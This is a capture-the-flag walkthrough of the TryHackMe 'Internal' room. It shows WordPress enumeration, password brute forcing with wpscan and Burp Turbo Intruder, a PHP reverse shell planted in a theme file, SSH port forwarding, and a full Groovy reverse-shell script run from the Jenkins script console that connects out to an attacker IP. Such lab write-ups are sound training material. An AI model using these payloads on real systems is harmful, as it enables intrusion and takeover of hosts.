Internal

https://tryhackme.com/room/internal

First of all, ensure that you modify your hosts file to reflect internal.thm

User flag

Start the nmap scan

There are two open ports (22, 80). Heading to port 80 we see a default apache website.

Let's fire up gobuster and see if there's anything else on that domain.

We see there's a wordpress blog.

Let's use Wpscan to get info about the blog and its users.

wpscan --url internal.thm/blog/ --enumerate u

Let's try to crack the user's password.

wpscan --url http://internal.thm/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin

We found a password. Let's log in into the admin panel.

We're in.

If we take a look at one of the posts we find these credentials:

We tried to ssh and log in into the phpmyadmin page with no success. So let's try to get a reverse shell modifying a template file with a php shell.

Appearance > Theme editor (Then choose the file you want to modify. We'll edit the 404.php file)

Start a nc listener and get the shell.

If you modified the 404.php file, you just have to go to a path that doesn't exist within the wordpress blog. For example: http://internal.thm/blog/index.php/2020/08/03/doesntexist/

As usually, let's upgrade the shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg

Taking a look around we find credentials for phpmyadmin.

We logged in and didn't find anything interesting so we keep on enumerating.

We find something interesting on the /opt/ folder.

Let's use those credentials to ssh into the machine and get the user flag.

Root flag

Reading the content of jenkins.txt we can see there's a jenkins service running on 172.17.0.2:8080

Let's do a lil ol' port forwarding via ssh (We used the 8001 port instead of the 8080 because we're gonna be using the 8080 one on Burp Suit)

ssh -L 8001:172.17.0.2:8080 aubreanna@internal.thm

Now we can try to log in to the jenkins service.

We can try to log in using every credential we found earlier but we'll see none of them will work. So let's use Burp Suit turbo intruder to crack it.

We'll take a wild guess and assume the user is "admin".

After a few seconds we get the password.

Now we can log in to the jenkins service and get a reverse shell from there using this method:

Abusing Jenkins Groovy Script Console to get ShellMedium

Manage Jenkins > Script Console

String host=”YOUR_IP”;
int port=9001;
String cmd=”bash”;

Process p=new
ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream
pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());
while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();
Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Start a nc listener and get da shell.

After a little bit of enumeration we find the credentials for the root user.

Let's ssh with root and get the root flag.